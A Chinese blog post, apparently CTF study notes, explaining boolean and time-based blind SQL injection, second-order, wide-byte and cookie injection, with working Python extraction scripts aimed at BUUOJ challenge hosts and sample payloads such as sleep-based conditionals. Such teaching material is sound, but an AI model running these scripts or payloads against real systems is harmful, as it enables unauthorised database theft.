浅谈sql盲注(bool和时间)和二次注入 宽字节 cookie

最新推荐文章于 2024-07-09 21:03:25 发布
最新推荐文章于 2024-07-09 21:03:25 发布
阅读量466 收藏
点赞数
文章标签: web安全 php sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63548648/article/details/128199169
版权

目录

1.bool盲注

2.时间盲注

3.二次注入

4.宽字节注入

         5.cookie注入

bool和时间盲注的返回结果都是无回显的,这就是判断是否为盲注的一个重要特征。

1.bool盲注

基于布尔的盲注是在这样的一种情况下使用:页面虽然不能返回查询的结果,但是对于输入 布尔值 0 和 1 的反应是不同的,那我们就可以利用这个输入布尔值的注入点来注入我们的条件语句,从而能根据页面的返回情况推测出我们输入的语句是否正确(输入语句的真假直接影响整条查询语句最后查询的结果的真假)

 一般bool是会用到if()语句来判断的

如何判断是否为bool注入

布尔盲注只有true跟false,也就是说它根据你的注入信息返回true和false两个,而不是返回报错信息   如果输入的语句被过滤了,也可能会返回一些语句来说明被过滤了。

总结:

bool盲注就是会返回true  false 和要报错的语句。

注意:

另外,虽然我们构造语句的目的是让整条语句在某种情况下最后查不到结果,但是这其中其实隐含了两种情况,一种就是真的没有查到结果,使得页面的返回有所不同,但是还有一种可能就是我们构造语句让其报错,这样同样让页面的返回有所不同,但是我个人往往不愿意将这种报错的模式再另外划分出一个什么报错盲注,这里我就统一将其划分到布尔盲注中了,因为本质是一样的,所以这一部分还会设计一些报错注入的东西。

 mid或者substr(str,start,length) :字符串截取

right或者left:(截取的字符串,截取长度)

ORD或者ascii() :转换成ascii码

Length() :统计长度

version() :查看数据库版本

database() :查看当前数据库名

user() :查看当前用户

 bool注入后面不用加#号

 这就是bool注入所需要的脚本,还有上面所需的语句,要判断是否为bool注入的话,可以用if  length  substr  ord ascii mid 等来判断。判断出来后就可以用脚本开始来跑。

bool注入的一道例题

[CISCN2019 华北赛区 Day2 Web1]Hack World

首先跑下bp字典,看下哪些东西被过滤了。

 长度为482的都是被过滤的。

简单试了下,发现1和2返回的结果不同,而且输入其他的东西会返回bool(false),就有点怀疑是bool注入.

if(ascii(substr((select(database())),1,1))>101,1,2)  //返回1
if(ascii(substr((select(database())),1,1))=1,1,2)   //返回2
#  //返回bool(false)
length //返回的是过滤语句

 以后也可以拿上面的语句来测试是否为bool注入。

order by (判断有多少列)是和union注入一起用的    

所以可以判断出这是个bool注入。

接下来直接上脚本跑(盲注的题一般都会用到脚本来跑)

import requests
import time

flag = ''


def funss(jige):
    url = 'http://2dbe92b2-f5af-421e-b9ff-2812805a35d6.node4.buuoj.cn:81/'  #不同的题要修改不同的url
    sql = "if(length(bin(ascii(substr((select(flag)from(flag)),{},1))))=7,1,2)" .format(
        jige)# sql里面的语句可以根据题目的不同来更改
    data = {"id": sql}  #这里面的id要根据不同题目给的注入点名字的不同来修改
    re = c.post(url, data=data, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'Hello' in re.text:      #这个Hello也是,根据题目给的不同回应来修改,这个Hello是输入为1的时候返回的值 到时候就修改这里
            len = 7
        else:
            len = 6
    else:
        print(jige)
        exit(0)
    str = ''
    for i in range(1, len+1):
        sql = 'if(substr(bin(ascii(substr((select(flag)from(flag)),{},1))),{},1)=0,1,2)'.format(
            jige, i)  #这个sql和上面说的一样,也要修改
        data = {"id": sql}  #这个id也要修改
        re = c.post(url, data=data, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'Hello' in re.text:  #Hello需要修改
                str += '0'
            else:
                str += '1'
        else:
            print(jige)
            exit(0)
    return chr(int(str, 2))


c = requests.session()
for i in range(1, 100):
    flag += funss(i)
    print(flag)

最后就能跑出flag.  (就是有点慢)

2.时间盲注

时间盲注也是无回显的,判断和bool差不多,但是得换成sleep()函数来判断,看是否存在延迟,如果存在,那就是延迟注入。

sleep()                             //延迟函数
if(condition,true,false)               //条件语句      
ascii()                              //转换成ascii码
substring("string",strart,length)      //mid()也一样,取出字符串里的第几位开始,长度多少的字符

If表达式:IF(expr1,expr2,expr3)

如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3

Mid函数:MID(column_name,start[,length])

column_name

必需。要提取字符的字段。

start

必需。规定开始位置(起始值是 1)。

length

可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

延时注入的原理就是,所要爆的信息的ascii码正确时,产生延时,否则不延时

 所用到的函数和bool差不多,只是换成了sleep()。

1' and if(ascii(substr(database(),1,1))=114,1,sleep(5))#

 判断是否执行,可以打开bp看看页面是否有过一会才显示出界面。如果是的话,则为时间注入。

 以下为脚本

import requests
import time
 
s = requests.session()
url = 'http://f734016e-561a-4e5c-bbe2-2866eba7d248.node4.buuoj.cn:81/comments.php?name='
flag = ''
i = 0
d = 0
while d == 0:
    i = i + 1
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        # payload = f'1%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(3))'
        # payload = f'1%0cand%0cif(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{i},1))>{mid},1,sleep(3))'
        # payload = f'1%0cand%0cif(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="wfy_comments")),{i},1))>{mid},1,sleep(3))'
        payload = f'1%0cand%0cif(ascii(substr((select(text)from(wfy_comments)where(user="f1ag_is_here")),{i},1))>{mid},1,sleep(3))'
        stime = time.time()
        url1 = url + payload
        r = s.get(url=url1)
        r.encoding = "utf-8"
        print(payload)
        if time.time() - stime < 2:
            low = mid + 1
        else:
            high = mid
    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

3.二次注入

二次注入 - 简书

这个师傅写的文章可以拿来学习,又详细又有例子说明。

Sql语句变为UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password=' ,也就是执行了UPDATE users SET passwd="New_Pass" WHERE username =' admin'

主要就是这句话,先设置了密码,这就造成了一个漏洞

4.宽字节注入

Hr-Papers|宽字节注入深度讲解 - FreeBuf网络安全行业门户

可以看看这篇文章,讲的很详细了,所谓宽字节注入,就是会把'  --> \'   我们的绕过方法就是了解它是什么类型的编码,然后利用该类型的编码来合并掉\,使得'能够闭合。例如gbk编码的话,就可以用%df来闭合,%df加上\是一个汉字,就会使得'闭合。接下来的注入就可以使用union或者报错注入来注入了。

5.cookie注入

【SQL注入】cookie注入:原理、步骤、示例_51CTO博客_sql注入原理

可以看看这篇文章,讲的挺详细的,cookie注入就是把原本get post 传的值变成了cookie传。然后就其他的就都一样了。union或者报错注入。

ke1nys
关注
【网络安全 | 2万字总结】SQL盲注?这一篇就够了。
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
Sql注入漏洞汇总-上
黑战士的博客
06-04 723
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
sql注入练习之bool盲注
windStudyer的专栏
05-22 1153
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
Sql注入_mysql盲注__二次注入
weixin_30340745的博客
03-22 154
sleep盲注攻击 Sleep延迟:延迟盲注 If(条件,true,false): 条件成立,返回第二个参数,反之第三个参数 举例1:length id=1 union select 1,2,sleep(if(length(database())=5,5,0)) 如果(database())=5 条件成立,返回5,不成立返回0 举例2:获取数据库名 mid...
sql注入之布尔booler注入
最新发布
m0_52484587的博客
07-09 922
id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='a'--+ id username password 等。id=1' and substr(database(),1,1)='a'--+ 逐字判断数据库名为 test,test 数据库名。3.id=1 and 1=2 结果异常。
渗透测试学习笔记(一)注入篇-盲注 二次注入 字节注入
weixin_40138844的博客
10-30 262
时间注入攻击 sleep() 利用函数if(条件,结果1,结果2) len id = 1 and if(length(database())>1,sleep(5),1) 首先猜解表名称长度 select sleep(length(table_name)=4,0,5) from information_schama.tables limit 0,1 再猜解表名,可以利用明文或者...
sql注入(二)盲注二次注入字节注入
m0_63306943的博客
04-30 1339
盲注二次注入介绍及实例
bool注入
qq_46540840的博客
03-14 834
sql注入-布尔盲注 以buuctf上的题具体来说 题目链接 方法一:布尔注入 方法二:报错注入 解题: 首先查看源代码:可以得到提示:得到一种思路:报错注入 这里拿布尔注入具体来说: 首先拿Bp判断: 输入name=admin &pass=1时:urldecode解码得到密码错误 name=1’or 1=1 # &pass=1 得到与1相同结果 name=1’or 1=2 # &pass=1得到是字符型注入 解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :
第六天二次注入sqlmap简单参数
代码审计
03-09 2821
二次注入 今天学习二次注入 二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是在数据库内部调用读取语句的时候又被还原。 二次注入,可以概括为以下两步: 第一
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1265
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
WebSQL注入攻击
weixin_43916678的博客
11-05 1604
SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。 联合查询的利用前提:页面有显示位 联合注入的过程:判断注入点、判断是整型还是字符型、判断查询列数、判断显示位、获取所有数据库名、获取数据库所有表名、获取字段名、获取字段中的数据 常规思路 判断是否存在注入. 字符型1’ and ‘
bool_injection
02-13
布尔注入 考点 bool注入,通过页面返回的结果判断是否存在注入 启动 通过docker-compose启动 docker-compose up -d open http://127.0.0.1:8304 通过docker run启动 docker run -d -P print1n/bool_injection 版权 如果名义,请联系作者删除( )
SQL注入之布尔式(boolean)注入
2301_79299101的博客
09-22 375
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。
mysql bool注入,SQL注入【七】——Boolean注入
weixin_39862097的博客
03-23 406
基本注入流程有些人以为布尔盲注就是页面或者返回结果数据包中带有yes或者no,其实这种说法不正确0x01 判断注入点类型数字型字符型如果是字符型还得通过闭合,具体可以查看我之前的文章数字型和字符型0x02 获取数据库库名1. 判断当前数据库库名长度length():判断字符长度利用and length(database())不断去构造条件,如:and length(database())>1...
SQLi-LABS
m0_74855736的博客
03-14 821
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。
简单理解延时注入 报错注入 盲注
qq_54030686的博客
12-08 299
延时注入 报错注入 盲注的原理 没啥原理,select执行语句的地方不一致 正常的话直接使用’and UNION SELECT 1,version(),3 --+’ 目标执行sql语句的位置不一样,回显不一样,选择不同的函数而已 insert,updata,delete修改数据,和select *from class查询函数需要选择不用的函数注入,页面是否存在回显又要选择不同的函数注入 包括http头注入cookie注入实际上是页面获取数据的位置不一样而已 %23 延时注入 例子 If(ascii(sub
SQL注入漏洞之布尔(Boolean)注入
m0_71109835的博客
02-01 1231
其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输入的参数可以拼接的SQL语句中,并且可以被执行。:SQL注入之所以得以存在主要是因为WEB应用程序对用户输入的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。5.在得知数据库名字长度后,我们可以用穷举的方法猜测出数据库的名字。
【ctf】布尔型注入
chualam的博客
11-03 321
步骤:猜数据库名字长度--猜数据库名字 --猜表单数量--猜表单名字长度 --猜表单名字--猜字段数量--猜字段长度--猜字段 1 and length(database())>3 1 and mid(database(),1,1)='a' //用substr函数也行 1 and ascii(substr((select database()),1,1))='数字' 1 and left(database(),4)='sqli' //判断字符串 1 and 1=((select count.
python实现sql布尔盲注(多个cookie,引号过滤绕过)
箭雨镜屋
07-04 405
本文使用python3的requests模块发送和接收http报文 1、Cookie头包含多个值 单个cookie的情况,cookie可以通过headers参数传入,比如: import requests url = "http://192.168.101.16/pikachu/vul/sqli/sqli_blind_b.php" headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) A
超级SQL注入工具V201512271:C#开发的全语言盲注与高效HTTP交互
该工具特别强调对多种SQL注入类型的兼容性,包括但不限于Bool盲注、错误显示注入以及Union注入,这使得它适用于广泛的应用场景,如Access、MySQL5及以上版本、SQLServer和Oracle等数据库。 工具的核心技术优势...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值